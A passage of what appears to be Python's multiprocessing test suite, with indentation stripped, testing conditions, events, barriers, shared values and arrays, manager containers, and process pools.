p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
